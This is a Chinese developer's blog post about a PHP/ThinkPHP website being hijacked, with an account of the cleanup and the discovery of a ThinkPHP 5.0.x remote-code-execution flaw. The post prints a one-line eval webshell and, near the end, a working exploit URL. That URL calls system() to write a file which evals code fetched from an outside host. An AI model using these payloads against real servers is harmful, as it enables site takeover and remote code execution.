苍了个天了~网站被挂马!

2019-02-27 11:54:07来源:博客园 阅读 ()

新老客户大回馈,云服务器低至5折

【注:PHP、ThinkPHP】

事情是这样的~

2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。

打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~  当务之急是让网站可以正常的运行,先把这入口文件改回以前的代码上传到服务器,这样网站暂时是可以正常运行了。

但是需要找的问题的根本所在,这种网站代码恶意被修改的事我是第一次遇到,以前都是听说过没见过。 没有经验,就上百度。找一下这个问题的处理和排查流程。

根据网上所述,首先是将一句话代码(<?php @eval($_POST['a'])>)上传到网站,然后通过这个一句上传一个可以操作网站目录的文件,再通过这个文件对网站的代码进行修改和上传。

所以现在要做的是:

1、首先找到已经被上传到网站的恶意文件,将其删除。

2、找到攻击者所利用的代码中的漏洞。

怎么找到那些已经被上传上来的文件,可以下载安全狗对拷贝下来的所有代码进行扫描,这些文件的代码有的写法会相同。会存在一些函数 eval、assert,这些文件还好找,找着后在服务器上删除就好了。难的是找到代码中的漏洞,网上提供了一些可能会出现漏洞的地方,一个是上传文件的地方,一个是编辑器插件中带的上传功能。

这些地方我一个试了试,排查了一遍。

2月13日,我发现网站首页又被修改了,看来问题的根本没有找对,继续在网上百度,问一些大佬。

2月14日,还是再找。

2月15日,一位大佬给我发来了一个ThinkPHP框架的漏洞信息,说的是ThinkPHP5.0 ~ 5.0.23之间的版本都存在一个严重的漏洞,可通过这个漏洞执行写文件的操作。

赶紧升级版本,升级的安全的版本。

之后,我也试了一下有漏洞的那个版本,真的可以很容易的将想要的代码写入到文件,然后在线上运行。

而且就是一行连接就能搞定:

项目域名加上

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval(file_get_contents(%22http%3a%2f%2fcqy666.cn%2fphp.jpg%22))?^%3E%3Etest.php

然后访问test.php,就能操作网站的所有目录了。Amezing~


原文链接:https://www.cnblogs.com/heiue/p/10438793.html
如有疑问请与原作者联系

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:laravel5.5源码笔记(六、中间件)

下一篇:[日常] imap协议读取邮件